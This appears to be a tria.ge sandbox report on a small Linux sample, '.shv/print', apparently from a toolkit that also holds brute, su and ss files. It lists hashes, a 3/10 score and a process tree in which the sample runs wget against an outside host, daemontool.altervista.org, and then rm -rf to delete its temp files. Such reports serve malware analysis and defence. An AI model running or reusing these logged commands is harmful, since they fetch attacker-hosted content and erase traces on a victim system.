Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

3

Static

static

1

.shv/brute

ubuntu-18.04-amd64

1

.shv/print

ubuntu-18.04-amd64

3

.shv/print

debian-9-armhf

1

.shv/print

debian-9-mips

3

.shv/print

debian-9-mipsel

3

.shv/ps

ubuntu-18.04-amd64

.shv/rand

ubuntu-18.04-amd64

1

.shv/rand

debian-9-armhf

1

.shv/rand

debian-9-mips

1

.shv/rand

debian-9-mipsel

1

.shv/ss

ubuntu-18.04-amd64

1

.shv/su

ubuntu-18.04-amd64

3

.shv/su

debian-9-armhf

1

.shv/su

debian-9-mips

3

.shv/su

debian-9-mipsel

3

Analysis

  • max time kernel
    3s
  • max time network
    133s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20231215-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20231215-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    22/12/2023, 04:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    .shv/print

  • Size

    163B

  • MD5

    b9f8821dff37b42df51094a7a2115017

  • SHA1

    3e256b9fc1d82918b75bdf928303867d72775a54

  • SHA256

    5c112f4d6465349be43580ea7e69bbec15698bbf9164bb77b53f8a0b92f01d73

  • SHA512

    83d38899e05613e9aa0b2a9aeae7c703ca90196c715af287ecb661767631e25a59e91460d76ba4199b641e397d6808a703b5b1b444c6a07c2252632c600cc0d6

Score
3/10

Malware Config

Signatures

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/.shv/print
    /tmp/.shv/print
    1⤵
      PID:1548
      • /usr/bin/wget
        wget -O .tmp "http://daemontool.altervista.org/js/i.php?request=asdfgh"
        2⤵
        • Writes file to tmp directory
        PID:1553
      • /bin/rm
        rm -rf ".tmp*"
        2⤵
          PID:1554
        • /bin/rm
          rm -rf "*request*"
          2⤵
            PID:1555
        • /bin/cat
          cat t.log
          1⤵
            PID:1550
          • /usr/bin/sort
            sort
            1⤵
              PID:1551
            • /usr/bin/uniq
              uniq
              1⤵
                PID:1552

              Network

              MITRE ATT&CK Matrix

              Replay Monitor

              Loading Replay Monitor...

              Downloads